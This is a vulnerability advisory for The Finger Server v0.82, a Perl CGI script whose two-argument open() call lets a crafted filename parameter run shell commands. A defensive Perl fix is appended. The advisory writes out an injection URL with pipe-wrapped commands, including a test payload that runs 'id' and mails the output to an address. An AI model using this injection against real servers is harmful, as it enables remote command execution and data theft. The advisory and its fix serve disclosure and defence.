Vulnerability

    "The Finger Server"

Affected

    "The Finger Server"

Description

Iain Wade found the following. In 1999 he was tinkering with The Finger Server v0.82 and came across some bugs which let you execute shell commands under the privileges of the web server. It's available at http://www.glazed.org/finger/

It's just another case of perl doing its magic on an open() call. There are undoubtedly other problems, but the offending code exploited here is:

    open (PLANS, "$plan_path$filename") || do {
        print "Can't open $plan_path$filename: $!";
        return;
    };

It is called with the following arguments:

    finger.cgi?action=archives&cmd=specific&filename=99.10.28.15.23.username.plan

It does minimal checking before that point, really only making sure the username is valid, but for example by using:

    finger.cgi?action=archives&cmd=specific&filename=99.10.28.15.23.username.|<shellcode>|

you can execute whatever...

The output will obviously not get to you (the web client) if you use |<shell command>|; it does however get executed. So an example to test it could be |id|mail+email@address|

Surrounding it in pipes is the only way one could get it to execute, otherwise it would return open errors.

Solution

Nothing yet.
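One way to close the open() problem described above, as an added example that is not code from The Finger Server or from the advisory: validate the archive name against an allow-list and use three-argument open so the mode never comes from the request. The function name read_plan, the username character set and the temporary directory are assumptions made for the demonstration.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use File::Temp qw(tempdir);
use File::Spec;

# Assumed archive name format, taken from the request shown in the advisory:
# YY.MM.DD.HH.MM.<username>.plan  (\A and \z also reject a trailing newline)
my $PLAN_NAME = qr/\A\d{2}(?:\.\d{2}){4}\.[A-Za-z0-9_-]{1,32}\.plan\z/;

# Hypothetical replacement for the archive read; returns (text, error).
sub read_plan {
    my ($plan_path, $filename) = @_;
    return (undef, "rejected filename")
        unless defined($filename) && $filename =~ $PLAN_NAME;
    my $full = File::Spec->catfile($plan_path, $filename);
    # Three-argument open: the mode is fixed to '<', so '|', '>' or
    # whitespace in the name are treated as part of a file name only.
    open(my $fh, '<', $full)
        or return (undef, "cannot open plan: $!");  # user-supplied name not echoed
    local $/;                                       # slurp the whole file
    my $text = <$fh>;
    close $fh;
    return ($text, undef);
}

# Constructed demo data: one valid plan file in a temporary directory.
my $dir  = tempdir(CLEANUP => 1);
my $good = '99.10.28.15.23.username.plan';
open(my $out, '>', File::Spec->catfile($dir, $good)) or die "setup: $!";
print {$out} "sample plan text\n";
close $out;

# Constructed inputs: the valid name, the piped form from the advisory,
# a path traversal, and a valid name with a trailing newline.
for my $name ($good, '99.10.28.15.23.username.|id|',
              '../../etc/passwd', "$good\n") {
    my ($text, $err) = read_plan($dir, $name);
    (my $shown = $name) =~ s/\n/\\n/g;
    printf "%-34s => %s\n", $shown,
        defined $text ? "read " . length($text) . " bytes" : "ERROR: $err";
}
```

Only the first name is read; the other three are rejected by the allow-list before open() is reached, and the three-argument form remains a second barrier if the pattern is ever loosened.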